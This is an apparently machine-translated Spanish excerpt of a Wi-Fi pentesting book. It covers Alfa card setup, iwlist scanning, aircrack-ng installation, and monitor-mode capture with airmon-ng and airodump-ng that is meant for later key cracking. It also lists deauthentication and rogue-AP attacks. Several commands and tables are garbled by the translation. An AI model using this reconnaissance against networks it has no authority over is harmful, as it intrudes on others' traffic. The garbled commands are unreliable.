Utilizando el espacio mientras evitamos MBR, aprenderemos el proceso para eliminar Kali Linux de manera ordenada.

P. ¿Por qué no podrá arrancar?

Kali Linux instala su información de arranque en el registro de arranque maestro mientras reemplaza la información de arranque de

cualquier sistema operativo anterior (generalmente Windows). luego se agrega al menú de opciones al inicio para elegir desde qué
sistema operativo iniciar.

Entonces, un cargador GRUB dañado significa una lista inutilizable de sistemas operativos.

P. ¿Qué necesitas hacer?

Elimine la partición principal y de intercambio.

Siga paso a paso, o podría terminar eliminando sus datos confidenciales:

1. Haga clic derecho en Computadora > Administrar.

2. Almacenamiento > Administración de discos en el panel izquierdo.

dieciséis
Machine Translated by Google

Debería ver algo como esto:

El tamaño de la partición puede variar.

Haga clic derecho en la partición principal y luego haga clic en Eliminar volumen.

Aparecerá una ventana. haga clic en eliminar. Esto eliminará tanto la partición principal como la de intercambio
asociada.

Creará una partición no asignada (~46 GB en este caso).

Reinicie su sistema.
Arranque desde Kali Linux USB.
Ejecute Live o instale.
¡Voila!

Ha terminado con su instalación de Kali Linux.

17
Machine Translated by Google

Configuración del adaptador inalámbrico

Configurar una tarjeta Alfa en Kali Linux es bastante fácil ya que todos los controladores necesarios vienen preinstalados

para habilitar la inyección de paquetes y la detección de paquetes.

Al ser una tarjeta de propósito específico, la tarjeta Alfa no necesita ninguna configuración en Kali Linux. Es un dispositivo Plug-

and-play. Sin embargo, si intenta usar la tarjeta Alfa en Windows <10, deberá instalar los controladores desde el CD (en la caja).

Para problemas de compatibilidad de controladores: Vaya aquí

Siga las instrucciones paso a paso para configurar su tarjeta:

Paso 1:

Conecte su tarjeta Alfa a la computadora portátil.

VMWare > VM > Dispositivos extraíbles > Tarjeta Wi-Fi > Conectar (Desconectar del host)

Aquí, Windows es la máquina host para cualquier sistema operativo VMWare. Para conectar y acceder a la tarjeta Alfa dentro

de la máquina virtual, debemos desconectarla del sistema host (Windows).

Paso 2:

Inicie sesión en Kali Desktop.

Haga clic con el botón derecho > "Abrir terminal" y escriba iwconfig.

Verás algo como esto:

eth0 sin extensiones inalámbricas.

lo sin extensiones inalámbricas.
wlan0 IEEE 802.11bgn ESSID:desactivado/cualquiera
Modo:Administrado Punto de acceso: No asociado Tx-Power=27 dBm Límite corto de reintento:7
RTS thr:off Fragmento thr:off
Clave de cifrado: desactivada
Administración de energía: apagado

18
Machine Translated by Google

wlan0 es la interfaz inalámbrica creada para la tarjeta Alfa.

Para verificar el estado actual de la interfaz, ejecute ifconfig

eth0 Enlace encap:Ethernet HWaddr [Link]

UP BROADCAST MULTICAST MTU:1500 Métrica:1
Paquetes RX: 0 errores: 0 descartados: 0 desbordamientos: 0 marco: 0
Paquetes TX:0 errores:0 descartados:0 desbordamientos:0 operador:0
colisiones:0 txqueuelen:1000 RX
bytes:0 (0.0 B) TX bytes:0 (0.0 B)

lo Enlace encap:Local Loopback inet

addr:[Link] Máscara:[Link]
dirección inet6: ::1/128 Ámbito:Host
UP LOOPBACK EJECUTANDO MTU:65536 Métrica:1
Paquetes RX: 0 errores: 0 descartados: 0 desbordamientos: 0 marco: 0
Paquetes TX:0 errores:0 descartados:0 desbordamientos:0 operador:0
colisiones:0 txqueuelen:0 RX
bytes:0 (0.0 B) TX bytes:0 (0.0 B)

Cuando ejecuta ifconfig, muestra las interfaces que están activas. Wlan0 no está activo en este momento.
Póngalo con el comando:

ifconfig wlan0 arriba

ifconfig wlan0
wlan0 Encap de enlace:Ethernet HWaddr [Link]
UP BROADCAST MULTICAST MTU:1500 Métrica:1
Paquetes RX: 269 errores: 0 descartados: 0 desbordamientos: 0 marco: 0
Paquetes TX: 29 errores: 0 descartados: 0 desbordamientos: 0 portador: 0
colisiones: 0 txqueuelen: 1000 RX
bytes: 17324 (16,9 KiB) TX bytes: 3792 (3,7 KiB)

La dirección MAC [Link] debe coincidir con la dirección MAC impresa debajo de su tarjeta Alfa. Esta
es una verificación rápida para asegurarse de que ha habilitado la interfaz correcta. En caso de que esté utilizando
la tarjeta alfa en Kali Linux instalada directamente en la PC.

19
Machine Translated by Google

Configuración de la tarjeta Alfa

Ahora comprobaremos si su tarjeta Alfa funciona correctamente, escaneando y detectando puntos de acceso para asegurarnos

de que en el futuro no tengamos ningún problema relacionado con el escaneo.

Siga estos pasos para conectar su adaptador inalámbrico al punto de acceso.

Escanea el aire con la utilidad principal

Iwlist es una herramienta que viene preinstalada en casi todos los sistemas Linux en el paquete core utils. Este es el mismo

paquete que le brinda todos los comandos útiles como ls, ps, mv, iw.

¿Qué sucede si tiene un dispositivo estándar sin acceso a Internet? ¿Cómo hiciste el pentest?
¡Con utilidades básicas!

Paso 0:

Elimine al administrador de red para evitar problemas de administración de NIC

servicio de parada del administrador de red

Paso 1:

Escanee el aire en busca de puntos de acceso disponibles.

escanear iwlist wlan0

Producción:

wlan0 Escaneo completado:

Celda 01 - Dirección: [Link]
Canal: 6
Frecuencia: 2,437 GHz (Canal 6)
Calidad = 70/70 Nivel de señal = -31 dBm Clave
de cifrado: en ESSID: "rootsh3ll"

Tasas de bits: 1 Mb/s; 2 Mb/s; 5,5 Mb/s; 11 Mb/s; 18 Mb/s

24 MB/s; 36 MB/s; 54 MB/s
Tasas de bits: 6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s
Modo: Maestro
Extra:tsf=00000003dee43bf3
Extra: Última baliza: hace 36 ms
IE: Desconocido: 0009726F6F747368336C6C
ES: Desconocido: 010882848B962430486C
ES: Desconocido: 030106
ES: Desconocido: 2A0100
ES: Desconocido: 2F0100
IE: Cifrado de grupo IEEE 802.11i/WPA2
versión 1: TKIP Cifrados por pares
(2): Conjuntos de autenticación CCMP TKIP
(1): PSK IE: Desconocido: 32040C121860

IE: Desconocido: 2D1A001119FF000000000000000000000000000000000000000000000

IE: Desconocido: 3D16060804000000000000000000000000000000000000000
ES: Desconocido: DD09001018020200040000
Es decir: Desconocido: DD180050F2020101800003A4000027A4000042435E0062322F00
Celda 02 - Dirección: [Link]
Canal: 9
Frecuencia: 2.452 GHz (Canal 9)
Calidad=47/70 Nivel de señal=-63 dBm Clave
de cifrado: activada

20
Machine Translated by Google

ESSID:"ravi@wifi"
Tasas de bits: 1 Mb/s; 2 Mb/s; 5,5 Mb/s; 11 Mb/s; 6 MB/s
9 MB/s; 12 Mb/s; 18 Mb/s
Tasas de bits: 24 Mb/s; 36 Mb/s; 48 Mb/s; 54 MB/s
Modo: Maestro
Extra:tsf=0000000436eb8c36
Extra: Última baliza: hace 36 ms
ES: Desconocido: 0009726176694077696669
ES: Desconocido: 010882848B960C121824
ES: Desconocido: 030109
ES: Desconocido: 2A0100
IE: Desconocido: 32043048606C
IE: Desconocido: 2D1A2C181EFF000000000000000000000000000000000000000000000
IE: Desconocido: 3D16090000000000000000000000000000000000000000000
ES: WPA Versión 1
Cifrado de grupo: TKIP
Cifrados por pares (2): TKIP CCMP
Conjuntos de autenticación (1): PSK
IE: IEEE 802.11i/WPA2 Versión 1 Cifrado de
grupo: TKIP Cifrados por pares (2): TKIP
CCMP Conjuntos de autenticación (1): PSK

Es decir: Desconocido: DD180050F2020101800003A4000027A4000042435E0062322F00

ES: Desconocido:
DD1E00904C332C181EFF000000000000000000000000000000000000000000000
Es decir: Desconocido: DD1A00904C34090000000000000000000000000000000000000000000
ES: Desconocido: DD0600E04C020160
ES: Desconocido:
DD930050F204104A0001101044000102103B0001031047001063041253101920061228D8FEE37B40A0102100124
42D4C696E6B20436F72706F726174696F6E1023000D442D4C696E6B20526F75746572102400084449522D363030
4C1042000D32303037303431332D303030311054000800060050F2040001101100084449522D3630304C1008000
226881049000600372A000120

La salida está muy desordenada. entonces, necesitamos filtrar la salida usando la utilidad iwlist .

exploración iwlist wlan0 | grep ESID

Producción:
ESID: "rootsh3ll"
ESSID:"ravi@wifi"

Desglose de comandos:

exploración iwlist wlan0: Escanee la interfaz inalámbrica wlan0, usando la utilidad iwlist
| agarre ESSID: Canalice la salida a grep usando |. Líneas de filtro que contienen la cadena ESSID

ESSID: identificador de conjunto de servicios básicos extendidos , también llamado nombre de punto de acceso.

Tarjeta Alfa escaneada con éxito para todos los puntos de acceso disponibles en las cercanías
1. rootsh3ll:
2. ravi@wifi

21
Machine Translated by Google

Conexión a un punto de acceso Wi-Fi a través de la Terminal

Conéctese a rootsh3ll (su punto de acceso Wi-Fi personal)

• Crear archivo de configuración
• wpa_passphrase [ssid] [contraseña] > [Link]

Mata al administrador de red:

Parada del administrador de la red de servicio

Instale wpa_supplicant, si es necesario:

sudo apt-get install wpasupplicant

wpa_contraseña rooth3ll iamrootsh3ll > [Link]

Mostrar contenido de [Link]

gato [Link]
red={
ssid="rootsh3ll"
#psk="iamrootsh3ll"
psk=1f4b02fe4c82f4e0262e6097e7bad1f19283b6687f084f73331db86c62498b40
}

Ahora conecte WIFI con la estación base (punto de acceso)

wpa_supplicant -D nl80211 -i wlan0 -c [Link]

Producción:
Wpa_supplicant inicializado con éxito
wlan0: SME: intentando autenticarse con [Link] (SSID='rootsh3ll' freq=2437 MHz)
wlan0: intentando asociarse con [Link] (SSID='rootsh3ll' freq=2437 MHz)
wlan0: Asociado con [Link]
wlan0: WPA: negociación de clave completada con [Link] [PTK=CCMP GTK=CCMP]
wlan0: CTRL-EVENT-CONNECTED - Conexión a [Link] completada [id=0 id_str=]

Desglose de comandos:

wpa_supplicant: Utilidad de stock para asociar las tarjetas inalámbricas con puntos de acceso de
Terminal
-D nl80211: Controladores inalámbricos para realizar el proceso de autenticación/asociación.
-i wlan0: Interfaz inalámbrica a utilizar. El tuyo puede ser diferente.
-c [Link]: Archivo de configuración creado con la utilidad wpa_passphrase.

Esa es toda la configuración que necesita conservar para ahorrar tiempo. Entremos ahora en la mecánica del AP falso

wpa_supplicant solo puede conectarse a redes de tipo WPA/2. Para conectar WEP puede usar iwconfig.

22
Machine Translated by Google

Sintaxis: iwconfig <interfaz> essid <ESSID> canal <#>

Ejemplo:
iwconfig wlan0 essid rootsh3ll canal 11

Para verificar que está conectado, use

ifconfig wlan0

La salida debería verse así:

wlan0 IEEE 802.11bgn ESID : "rootsh3ll"
Modo: Administrado Frecuencia: 2,462 GHz Punto de acceso: ec: 1a: 59: 43: 3f: fd
Bit Rate=18 Mb/s Tx-Power=20 dBm Límite
largo de reintentos:7 RTS thr:off Fragmento thr:off
Clave de cifrado: desactivada
Administración de energía: apagado
Calidad de enlace = 70/70 Nivel de señal = -32 dBm
Rx no válido nwid:0 Rx no válido crypt:0 Rx no válido frag:0
Reintentos excesivos de Tx: 0 Misceláneo no válido: 7 Baliza perdida: 0

23
Machine Translated by Google

Consejo profesional

Escanee los AP en busca de ESSID, BSSID, número de canal, intensidad de la señal, etc.
Filtre la salida de iwlist por ESSID y número de canal, por ejemplo
exploración iwlist wlan0 | grep -i “esid\| canal:"

Desglose de comandos:
exploración iwlist wlan0: Escanear interfaz inalámbrica wlan0

| grep-yo Canalice la salida a grep usando '|' mientras ignora el caso del carácter (-i)

“esid\| canal:" Filtrar por palabras clave essid y Canal:

Tenga en cuenta los dos puntos a lo largo del canal y ningún espacio después de la palabra clave.

Evita la salida de líneas innecesarias. Cada filtro debe escribirse entre comillas.

El operador de tubería se utiliza como operador OR. Lo que significa que grep mostrará una línea
que contiene cadenas essid O canal: (sin distinción entre mayúsculas y minúsculas).
Se utiliza una barra invertida \ para evitar que el operador OR actúe como canalización. Esto se
llama carácter de escape. Se utiliza para escapar de caracteres como espacios, comillas y otros
caracteres significativos para la sintaxis de shell.
Observe el resultado y experimente con distintas palabras clave, con \| para optimizar la salida
deseada.
--color (Opcional) para resaltar cadenas en rojo

Llévalo al siguiente nivel...

exploración iwlist wlan0 | grep -i --color "essid\| canal:\|calidad\|dirección"

Producción:
Celda 01 - Dirección: [Link]
Canal 1
Calidad=63/70 Nivel de señal=-47 dBm
ESID: "rootsh3ll"
Celda 02 - Dirección: [Link]
Canal 1
Calidad=41/70 Nivel de señal=-69 dBm
ESID: "anshu"
Celda 03 - Dirección: [Link]
Canal 1
Calidad=39/70 Nivel de señal=-71 dBm
ESID: "sareen"

24
Machine Translated by Google

La interfaz no admite el escaneo: dispositivo

o recurso ocupado
Una utilidad llamada administrador de red que administra todas las conexiones, su asociación, desasociación,
etc., todo por sí mismo. Cuando escanea el aire con iwlist, solicita controlar una tarjeta de interfaz de red (NIC) y choca
con el administrador de red. La utilidad de administrador de red pone la tarjeta en modo administrado y escanea los puntos
de acceso con una mejor intensidad de señal (en segundo plano), lo que genera un conflicto para que usted evite saltar
entre canales y escanear el aire.

Así que asegúrate de matarlo.

parada del administrador de red de servicio

Resumen
Este capítulo proporciona instrucciones detalladas sobre cómo instalar Kali Linux en la estación de trabajo VMWare.
Además, en el proceso, ha aprendido los pasos básicos para:

• Instalar Kali Linux en VMWare/HD y explorar otras opciones como desconectar

adaptador inalámbrico del anfitrión

• Configuración de la tarjeta Alfa mediante la línea de comandos

• Escaneo del aire y detección de los puntos de acceso disponibles, usando Terminal

• Escanear el aire como un ninja para el reconocimiento dirigido.

Es importante entender todos y cada uno de los comandos utilizados en el tutorial, si no ganó confianza en la
instalación del sistema y la configuración de la tarjeta Alfa, le recomiendo que repita este capítulo un par de veces.

En capítulos posteriores, cubriremos escenarios más complicados.

25
Machine Translated by Google

1
Comprender los conceptos
básicos de las redes Wi-Fi

Redes inalámbricas (Wi-Fi) y su necesidad

Antes de entrar en los detalles prácticos, me gustaría decirle que este capítulo será completamente
teórico y está escrito únicamente para una comprensión más profunda del Wi-Fi y su mecanismo de
seguridad.
Este capítulo lo llevará a través del comienzo de Wi-Fi, cómo funcionan las interfaces inalámbricas, cómo
Wi-Fi es diferente y mejor que Bluetooth (no solo en términos de velocidad de transferencia). También
aprenderá la similitud entre todos los dispositivos inalámbricos.

Por lo tanto, me gustaría que lea este capítulo detenidamente, ya que le ayudará a construir
una base sólida en redes inalámbricas, aumentará sus capacidades y será muy útil en su vida,
especialmente en su carrera relacionada con la seguridad.

Empecemos,

26
Machine Translated by Google

¿Qué es wifi?
Wi-Fi es el nombre de la popular tecnología de redes inalámbricas que utiliza ondas de radio para propagarse a
través del aire para proporcionar Internet de alta velocidad y conexiones de red que reducen el uso de cables de
manera efectiva. ver Webopedia

¿Cuál es la necesidad de Wi-Fi?

El mundo siempre se ha movido hacia lo mejor. Y según las estadísticas, está claro que en los próximos 5 años una
gran población utilizará dispositivos inalámbricos para almacenar datos, transmitir música, acceder a Internet de alta
velocidad, etc.

La tecnología inalámbrica no solo ahorra el elemento utilizado para fabricar los cables, sino que también
proporciona un costo de instalación mucho menor de los dispositivos, ya que no hay un cable para la instalación
por dispositivo, sino solo cierta información para registrar, lo que quizás sea cuestión de unos minutos.

Como vemos hoy en día, los dispositivos inalámbricos se han convertido en una parte esencial para la vida de uno.
Con el tiempo, se expandirá a tanta gente como sea posible.
Por lo tanto, más dispositivos inalámbricos, más vulnerabilidades y más necesidad de expertos en seguridad Wi-Fi.

Tipos de encriptación y su necesidad

Para la seguridad de los datos, los puntos de acceso Wi-Fi encriptan los paquetes de datos con un
algoritmo criptográfico para evitar, hasta cierto punto, las escuchas ilegales y otros tipos de brechas de seguridad.
Aunque cada uno de ellos tiene algún tipo de vulnerabilidad. Antes de explotar esas vulnerabilidades,
veamos los tipos y políticas de encriptación.

¿Cuáles son los tipos de cifrado?

La WLAN [red de área local inalámbrica] se puede proteger mediante 3 protocolos de seguridad
1. WEP: privacidad equivalente por cable
2. WPA: acceso protegido Wi-Fi
3. WPA2: acceso Wi-Fi protegido II

Los 3 protocolos tienen sus propios métodos de encriptación mejores que los anteriores.
• WEP: utiliza el algoritmo RC4 para cifrar paquetes de datos
• WPA: utiliza encriptación TKIP, basada en WEP
• WPA2: utiliza AES, más seguro e ininterrumpido en este punto

27
Machine Translated by Google

¿Cuál es la necesidad?
En 1997, Wi-Fi Alliance lanzó el primer estándar de seguridad para las redes inalámbricas, es decir
WEP, pero a principios de 2001, WEP se rompió dos veces, lo que llevó a la recuperación/piratería de la contraseña de la
red inalámbrica. Luego, nuevamente en 2002, un investigador de seguridad descubrió una falla de seguridad en WEP. WEP
se rompió sin posibilidad de reparación en este punto.
Este fue el momento en que el comité IEEE dijo que necesitaban un parche rápido para WEP.
En 2003 se lanzó WPA, una solución intermedia para WEP.

Se suponía que WPA se ejecutaría en el mismo hardware compatible con WEP. Todo lo que uno necesita hacer es una
actualización de firmware.
Algunas cosas clave a tener en cuenta:

• WPA utiliza encriptación TKIP, que envuelve los paquetes WEP para limpiar algunos
vulnerabilidades descubiertas anteriormente y proporcionan una mejor seguridad. Entonces, básicamente
estaba basado en WEP.

• Los cambios de hardware no eran obligatorios para WPA, ya que se suponía que corregirían la vulnerabilidad
del enrutador que ya se había enviado.

• Al mismo tiempo, la alianza Wi-Fi comenzó a trabajar en el protocolo muy seguro de Wi-Fi.
Fi, que se denominó WPA2.

Un año después, en septiembre de 2004, Wi-Fi Alliance lanzó la versión más segura de la seguridad inalámbrica, es
decir, WPA2.

¿En qué se diferencia WPA2 de WPA?

• Hay algunas diferencias básicas entre los dos:

• WPA2 usa AES para el cifrado de paquetes, es quizás el método de cifrado más seguro disponible e ininterrumpido
en este punto.

• Los cambios de hardware son obligatorios para ejecutar WPA2.

• Lanzado como el nuevo estándar para dispositivos inalámbricos y desde marzo de 2006 WPA2

la certificación es obligatoria para que todos los dispositivos nuevos lleven la marca Wi-Fi.

28
Machine Translated by Google

Comprender la IP pública y privada

Como sugiere el encabezado, hay 2 tipos de direcciones IP para una computadora conectada a una red.

IP pública
Una computadora en Internet se identifica mediante una dirección única de 32 bits, IP pública. Las direcciones
IP se registran públicamente con Network Information Center (NIC) para evitar conflictos de IP.
El público no necesita acceder a la computadora en la red de área local (LAN) protegida por enrutador, por
esta razón, la NIC ha reservado ciertas direcciones que nunca se pueden registrar públicamente. Esas
direcciones se llaman

ip privada
Dirección IP de una computadora dentro de una W/LAN. ejemplo, [Link]
Ciertas direcciones reservadas por la NIC se dividen en 3 clases de IP privadas:

Clases, subred y tamaño de grupo

Red Rango de direcciones IP Máscara de subred Máximo Usar
Clase Hospedadores

UN [Link] - [Link] [Link] 16.777.216 Para grandes redes

repartidas por ciudades

B [Link] - [Link] [Link] 1,048,576 Para redes como

universidades
C [Link] - [Link] [Link] 65.536 ¡Perfecto para
enrutadores domésticos!

Las direcciones IP privadas se asignan a los dispositivos cliente conectados al enrutador. Un cliente
El dispositivo puede ser su computadora portátil, móvil, tableta, cualquier cosa que sea inalámbrica.

29
Machine Translated by Google

¿Cómo comprobar la IP pública?

Simplemente busque en Google "mi ip". Mostrará su dirección IP expuesta públicamente.

Usos de IP pública
Además de simplemente ubicar el dispositivo a través de Internet, la IP pública juega un papel importante en

Búsqueda inversa de IP

A menudo se denomina verificación de dominio de IP inversa. Lo que sucede es que ingresa un nombre de
dominio, digamos [Link] y la herramienta de IP inversa verificará la dirección IP de [Link]
[[Link]] y luego verificará otros sitios que se sabe que están alojados en la misma dirección web.

Búsqueda de DNS

Sitios web como [Link] nos permite comprobar el servidor de nombres de un sitio web y otros

cosas interesantes con eso. ¡Este es, con mucho, uno de los mejores y más útiles sitios web para los piratas
informáticos!

Buscar ubicación de IP o geolocalización de IP

Simplemente busque en Google "encontrar ubicación IP" o vaya a este sitio web: [Link].
Mostrará todos los detalles relacionados con su IP pública. También puede ver su ubicación en Google Maps. ¡Seguir
mirando! encontrarás muchas cosas interesantes.

¿Cosas con IP privadas? Los estaremos interpretando a lo largo de la serie. ¡Manténganse al tanto!

Posibles ataques a un Punto de Acceso Wi-Fi (AP)

Incluso si no está conectado a la red porque no tiene la clave, aún puede realizar ataques a la WLAN o a los
clientes conectados (Dispositivos).
Algunos datos que siempre permanecen sin cifrar son:
1. ESSID o nombre de AP. “rootsh3ll” en nuestro caso.

30
Machine Translated by Google

2. BSSID, dirección MAC del Cliente

3. Dirección MAC del enrutador

4. Canal, en el que está funcionando el Punto de acceso.

5. Tipo de cifrado, WEP, WPA/WPA2 o WPS

Un atacante puede aprovechar esta información para realizar posibles ataques a

• Atasco en la red

• Desconectar cliente legítimo

• Forzar al cliente a conectarse al punto de acceso creado por un hacker o crear un honeypot

Futuro de Wi-Fi
A medida que el mundo se está moviendo de los dispositivos con cable a los inalámbricos (mejores) y también los
dispositivos inalámbricos se están volviendo exponencialmente más rápidos, mejores y más baratos, el futuro de Wi-Fi es

mucho más brillante.

Como habrás visto, el infame MacBook de Apple. Tiene un solo puerto (USB-C) para cargar, ya que la carga
inalámbrica no está disponible en este momento. Cualquier tipo de transferencia de datos hacia/a través de la
MacBook debe ser inalámbrica. Puede ser:
• Escuchando música
• Almacenamiento de datos en SSD

• Acceso a Internet, etc.

La parte crucial es que el almacenamiento de datos en SSD de forma inalámbrica puede ser más lento que el
almacenamiento con cables (USB 3.0). Pero la buena noticia es que MacBook y muchos enrutadores nuevos ahora
son compatibles con redes de tipo 802.11ac . Que es 3 veces más rápido que la red tipo n. Por lo tanto, el
almacenamiento de datos de forma inalámbrica será increíblemente más fácil no solo en MacBook sino en todos los
dispositivos que admitan redes de tipo ac.

31
Machine Translated by Google

2
Descifrando la red inalámbrica
Seguridad de la red

Introducción a Aircrack-ng Suite de

Instrumentos

¿Qué es Aircrack-ng?
Aircrack-ng es un conjunto de herramientas utilizado por principiantes y expertos para rastrear, descifrar y
crear puntos de acceso no autorizados.
La definición convencional es así:
Aircrack-ng es un programa de descifrado de claves 802.11 WEP y WPA/ 2-PSK que puede recuperar claves
una vez que se han capturado suficientes paquetes de datos.

La suite Aircrack-ng incluye herramientas como:

• Mon-ng
• Airodump-ng
• Airbase-ng
• Aireplaying
• Airolib-ng
• Aircrack-ng

32
Machine Translated by Google

Hablaremos sobre las herramientas anteriores, ya que son las herramientas más utilizadas y se utilizan en casi todos los

pentest inalámbricos.

Aircrack-ng viene para Linux, Mac y Windows y viene preinstalado en Kali Linux. Podemos instalar manualmente Aircrack-ng en

Linux, Mac o Windows.

Descargar Aircrack-ng
La última versión de Aircrack-ng se puede descargar desde su sitio oficial, [Link]

Para Linux y Mac, se puede instalar desde el código fuente, y

Para Windows, Aircrack-ng proporciona binarios precompilados. Puedes descargar el zip aquí

Instalar Aircrack-ng
En Windows, Aircrack-ng viene en un paquete binario precompilado de descarga y ejecución.

Instalación en Windows:
Descomprima aircrack-ng*.zip ([Link], como última versión)

Pasos para usar:

1. Abra la carpeta extraída aircrack-ng

2. Mantenga presionada la tecla [Shift] y haga clic derecho en cualquier lugar

3. Seleccione "Abrir ventana de comandos aquí"

4. Ingrese dir para la lista de archivos y carpetas

5. Ingrese cualquier comando para un menú de ayuda

Aquí hay un tutorial completo sobre la instalación en Windows.

Hay 2 formas de instalar Aircrack-ng en Linux:

• Usando el instalador de paquetes predeterminado, con repositorios, o

• Uso del código fuente

Tomaremos un ejemplo de

Instalación en Linux

USTED a través del administrador de paquetes a través del código fuente

ubuntu sudo apt-get install aircrack-ng cd ~/Escritorio/

wget [Link]

sombrero rojo sudo yum instalar aircrack-ng tar zxvf aircrack-ng*.[Link]

cd aircrack-ng-*/
Arch Linux sudo pacman install aircrack-ng make sqlite=true
hacer sqlite=true instalar

El parámetro sqlite=true es para agregar compatibilidad con Airolib-ng en Aircrack-ng. Veremos el uso de Airolib-ng para acelerar

el craqueo de WPA2 en los próximos capítulos.

Ahora comencemos a usar el conjunto de herramientas aircrack-ng

33
Machine Translated by Google

1. Asegúrese de que su tarjeta inalámbrica esté conectada. Luego abre la Terminal.

2. Escriba ifconfig y verifique su interfaz inalámbrica, wlan0 en mi caso y usaremos wlan0 en el tutorial

ifconfig wlan0
wlan0 Enlace encap:Ethernet HWaddr [Link] inet
addr:[Link] Bcast:[Link] Máscara:[Link]
dirección inet6: fe80::2c0:caff:fe5a:34b6/64 Alcance: Enlace
UP BROADCAST EJECUTANDO MULTICAST MTU:1500 Métrica:1
Paquetes RX: 37 errores: 0 descartados: 0 desbordamientos: 0 marco: 0
Paquetes TX: 33 errores: 0 descartados: 0 desbordamientos: 0 portador: 0
colisiones: 0 txqueuelen: 1000 RX
bytes: 4437 (4,3 KiB) TX bytes: 3506 (3,4 KiB)

Si escribe iwconfig wlan0 , debería obtener algo como esto:

iwconfig wlan0

wlan0 IEEE 802.11bgn ESID : "rootsh3ll"

Modo: Gestionado Frecuencia: 2,462 GHz Punto de acceso: [Link]
<--------------------------SNIP- ------------------------->

Puedes ver Modo: Administrado, ahora

¿Qué es el modo administrado?

De manera predeterminada, nuestra tarjeta inalámbrica funciona en modo administrado, es decir, solo aceptará el tráfico del punto

de acceso al que está asociada (conectada). Todos los demás paquetes irrelevantes se eliminarán para reducir la carga de

procesamiento del enrutador.

Y para el sniffing Wireless nuestra tarjeta tiene que estar en modo monitor para que pueda recibir tráfico de cualquier red

Wireless sin asociarse a ella.

Aquí viene la primera herramienta del conjunto de herramientas Aircrack-ng.

Airmon-ng
airmon-ng se utiliza para cambiar la tarjeta inalámbrica del modo Administrado al modo Monitor y viceversa.

También se usa para evitar que las pruebas de penetración inalámbricas tengan problemas con las utilidades existentes, como

administrador de red, wpa_supplicant, etc.

Simplemente verifique y elimine todos los procesos que podrían causar problemas antes de la prueba de penetración de Wi-Fi.

airmon-ng comprobar matar

Soluciona casi todos los problemas a los que te enfrentarías durante el pentest.

Veamos cómo poner la tarjeta inalámbrica en modo monitor.

Poner la tarjeta en modo Monitor:

airmon-ng iniciar wlan0

Creará una interfaz con el nombre wlan0mon, verifique usando ifconfig.

34
Machine Translated by Google

Poner la tarjeta en modo administrado:

airmon-ng detener wlan0mon

Aquí wlan0mon se puede reemplazar por wlan0mon, wlan1mon, etc. Si se están ejecutando varias interfaces de
monitor.
Ahora tenemos que empezar a olfatear el aire. Se puede hacer usando

Airodump-ng
Airodump-ng nos permite

• Oler el aire usando la interfaz del modo monitor (wlan0mon)

• Volcar los paquetes capturados en un archivo “.cap”, y

• ¡¡¡Mucha INFORMACIÓN!!!

Comencemos airodump-ng

airodump-ng mon0
Este es el comando básico para ejecutar airodump-ng en la interfaz wlan0mon.

Mostrará una pantalla de salida como esta:

CH 4 ][ Transcurrido: 24 s ][ 2017-06-25 00:45

BSSID poder Balizas #Datos, #/s CH MB ENC CIPHER AUTH ESSID
[Link] -40 11 54e WPA 18
CCMP PSK 0 harry@
6 11 54e WPA2 CCMP PSK rootsh3ll
[Link] -67 13 80 0
[Link] -74 2 0 0 1 54e WPA2 CCMP PSK .com

BSSID ESTACIÓN poder Velocidad Sonda de fotogramas perdidos

[Link] [Link] -74 5e 5e 0 19
[Link] [Link] 0 0e-1 0 272 raícesh3ll
[Link] [Link] -127 0e- 0e 10 81

Cubriremos la información importante del resultado anterior.

Línea Segmento Significado

1 Capítulo 4 Frecuencia de la tarjeta en este momento.

Una tarjeta inalámbrica es un tipo de radio; puede funcionar en un canal a la vez. Verás el

número de canal variable en la salida airodump-ng. Se llama multiplexación por división de tiempo.

2 BSSID Identificador de conjunto de servicios básicos : MAC/dirección física de AP

La intensidad de la señal de la red enumerada, la unidad SI es dBm.

poder
Cuanto más cerca de cero, mejor.

ENC Esquema de cifrado. podría ser Abierto, WEP, WPA/WPA2

ESID Identificador de conjunto de servicios extendidos o nombre de punto de acceso

7 Estación Cliente asociado con el BSSID correspondiente

Investigacion El cliente envía paquetes de solicitudes de sondeo para un punto de acceso (rootsh3ll) al que se conectó previamente,
consulte la línea 13.

35
Machine Translated by Google

Presiona CTRL-C para detener el escaneo.

Los paquetes de datos también se pueden capturar y guardar en un archivo usando la opción -w con airodump-ng.

Ejemplo:
airodump -ng mon0 -w test_data_capture

Pulse ^C para salir y enumerar los archivos de datos capturados ls test_data_capture*

ls test_data_capture-01.*
prueba_datos_captura-[Link] test_data_capture-[Link]
prueba_datos_captura-[Link] test_data_capture-[Link]

airodump-ng ha guardado la salida en formatos .cap, csv y netxml.

Usaremos el archivo .cap para nuestro proceso de craqueo.
Los pasos anteriores deben seguirse en cada Pentest que haremos. Veremos el uso de las herramientas
restantes.

• Airbase-ng
• Aireplaying
• Airolib-ng
• Aircrack-ng

en los próximos capítulos, en consecuencia.

Conclusión
Aprendimos a instalar aircrack-ng en sistemas Linux y Windows. Poner la tarjeta inalámbrica en modo monitor y
escanear el aire y guardar la información en un archivo para uso futuro. ya que se utilizará en el craqueo WEP y
WPA/WPA2.

36
Machine Translated by Google

Introducción a Wireshark
Wireshark es un analizador de paquetes gratuito y de código abierto. Es una de las herramientas más
potentes y populares que utilizan los pentesters y los administradores de red para

• Solución de problemas de red

• Análisis de paquetes

• Desarrollo de software y protocolos de comunicaciones, y

• Educación

En cuanto al análisis, se utiliza para inspeccionar los paquetes que pasan a través de la interfaz de red, que
podría ser su Ethernet, LAN, Wi-Fi, USB (almacenamiento o módem). En otras palabras, Wireshark es un
rastreador de paquetes para los pentesters.

Desde la perspectiva de un pentester, Wireshark es un

• rastreador de paquetes

• analizador de red

• Herramienta de supervisión del rendimiento de la red

• Analizador de protocolos

La serie de datos que inspecciona Wireshark se denomina "marcos", que incluye "paquetes".
Wireshark tiene la capacidad de capturar todos los paquetes que pasan por la interfaz de red y decodificarlos
para su análisis.
El marco de datos puede estar encriptado o en texto claro, ejemplo de marco de baliza

Octetos 2 2 6 6 6 2 6 0 - 2312 4

FC D/I Dirección Dirección Dirección SC Dirección Cuerpo de trama CRC

Esta tabla muestra el formato de trama MAC

Acrónimo inverso:
FC : Control de fotogramas

D/I: ID de conexión/duración
SC : Control de secuencia
CDN: Verificación de redundancia cíclica

El siguiente extracto de Data and Computer Communications de William Stalling explica estos campos:

Control de tramas: indica el tipo de trama (control, gestión o datos) y proporciona información de
control. La información de control incluye si el marco es hacia o desde un DS, información de
fragmentación e información de privacidad.

